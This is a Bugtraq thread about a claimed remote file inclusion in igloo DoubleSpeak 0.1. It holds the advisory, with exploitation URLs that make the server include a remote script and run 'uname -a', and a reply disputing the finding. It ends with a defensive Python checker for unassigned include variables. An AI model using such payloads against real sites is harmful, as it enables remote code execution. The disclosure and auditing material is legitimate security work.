Message-ID: <814b9d50606121056w60623764wb1811d647349cc4e@mail.gmail.com>
Date: Mon, 12 Jun 2006 12:56:22 -0500
From: str0ke <str0ke@...w0rm.com>
To: "aminrayden@...oo.com" <aminrayden@...oo.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: igloo DoubleSpeak v 0.1 Multiple remote file inclusion
R@...N,

require "config.inc"; contains 'private' => '/www/mrpenguin.org/devel/private',

So this shouldn't be vulnerable. Missing something?

/str0ke

On 11 Jun 2006 20:47:48 -0000, aminrayden@...oo.com
<aminrayden@...oo.com> wrote:
> igloo DoubleSpeak v 0.1 Multiple remote file inclusion
>
> -----------------------------------------------------
>
> Aria-security.com advisory
>
> Bug Discovered by R@...N (amin emami)
>
> Original Advisory:http://www.aria-security.net/advisory/igloo/doublespeak.txt
>
> email:AminRayden@...oo.com
>
> Date:12/06/2006
>
> -----------------------------------------------------
>
> Affected software description:
>
> IGLOO DoubleSpeak <= 0.1
>
> Vendor:http://sourceforge.net/projects/iglooweb/
>
> Vulnerability:Multiple remote file inclusion
>
> -----------------------------------------------------
>
> Summary:
>
> DoubleSpeak, formerly known as the Igloo Weblog, aims to be the easiest to use and most customizable CMS (content management system) on the Internet.
>
> -----------------------------------------------------
>
> Vulnerable code:
>
> require "config.inc";
>
>
>
> require "$config[private]/local.inc";
>
> -----------------------------------------------------
>
> Proof of concept:
>
> The problem exists in the files below, where the variable $config[private] is used in a require() function without being declared:
>
> index.php
>
> faq.php
>
> hardware.php
>
> ianal.php
>
> links.php
>
> login.php
>
> logout.php
>
> new_stories.php
>
> old.php
>
> poll.php
>
> rtfm.php
>
> software.php
>
> TODO.php
>
> /admin/add_links.php
>
> /admin/add_story.php
>
> /admin/add_poll.php
>
> /admin/index.php
>
> /admin/view_story_queue.php
>
> /ui/create_acct.php
>
> /ui/submit_story.php
>
> /ui/suggest_poll.php
>
> /ui/suggest_topic.php
>
> /ui/vote_on_polls.php
>
> -----------------------------------------------------
>
> Exploitation example:
>
> http://www.r0x3d.com/[igloo_Path]/html/index.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a
>
> http://www.r0x3d.com/[igloo_Path]/html/faq.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a
>
> http://www.r0x3d.com/[igloo_Path]/html/hardware.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a
>
> ...
>
>
> -----------------------------------------------------
>
> Fix:
>
> Turn off register_globals and add this code before the vulnerable code:
>
> $config[private] = "./";
>
>
> ===========================
>
> Aria Security Research
>
> Http://www.aria-security.net
>
>
>
>
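
The question raised in the reply (is `$config[private]` assigned by `config.inc` before the dynamic `require` runs?) can be checked mechanically. The following is an added example, not part of either message or of DoubleSpeak: a heuristic Python check run over constructed file contents; the `array(...)` form of `config.inc` and all function and constant names are assumptions.

```python
import re

# Include whose path starts with an interpolated array element,
# e.g.  require "$config[private]/local.inc";
DYNAMIC_INCLUDE = re.compile(
    r'\b(?:require|include)(?:_once)?\s*\(?\s*"\$(\w+)\[(\w+)\]')
# Include of a fixed file name, e.g.  require "config.inc";
STATIC_INCLUDE = re.compile(
    r'''\b(?:require|include)(?:_once)?\s*\(?\s*["']([^"'$]+)["']''')


def assigns_key(php_source, var, key):
    """True if the source sets $var[key], directly or inside an array() literal."""
    direct = re.search(
        r'''\$%s\[\s*["']?%s["']?\s*\]\s*=[^=]''' % (var, key), php_source)
    literal = re.search(
        r'''\$%s\s*=\s*array\s*\([^;]*?["']%s["']\s*=>''' % (var, key), php_source)
    return bool(direct or literal)


def audit(script, files):
    """Return (var, key) pairs used in an include path with no earlier assignment."""
    source = files[script]
    findings = []
    for m in DYNAMIC_INCLUDE.finditer(source):
        var, key = m.group(1), m.group(2)
        before = source[:m.start()]
        # Code that runs first: the script so far plus the fixed files it included.
        seen = [before] + [files.get(n, "") for n in STATIC_INCLUDE.findall(before)]
        if not any(assigns_key(text, var, key) for text in seen):
            findings.append((var, key))
    return findings


# Constructed sample inputs (not the project's real files).
PAGE = '<?php\nrequire "config.inc";\nrequire "$config[private]/local.inc";\n'
PAGE_NO_CONFIG = '<?php\nrequire "$config[private]/local.inc";\n'
CONFIG_SETS_KEY = ("<?php\n$config = array(\n"
                   "  'private' => '/www/mrpenguin.org/devel/private',\n);\n")
CONFIG_WITHOUT_KEY = "<?php\n$config['title'] = 'example';\n"

if __name__ == "__main__":
    for label, files in [
        ("config.inc sets the key", {"index.php": PAGE, "config.inc": CONFIG_SETS_KEY}),
        ("config.inc lacks the key", {"index.php": PAGE, "config.inc": CONFIG_WITHOUT_KEY}),
        ("no config include", {"index.php": PAGE_NO_CONFIG}),
    ]:
        print(label, "->", audit("index.php", files) or "assigned before use")
```

An empty result means the path variable is overwritten before the `require`, so a request-supplied value under register_globals never reaches it; a non-empty result marks an include path that still depends on how the variable was populated.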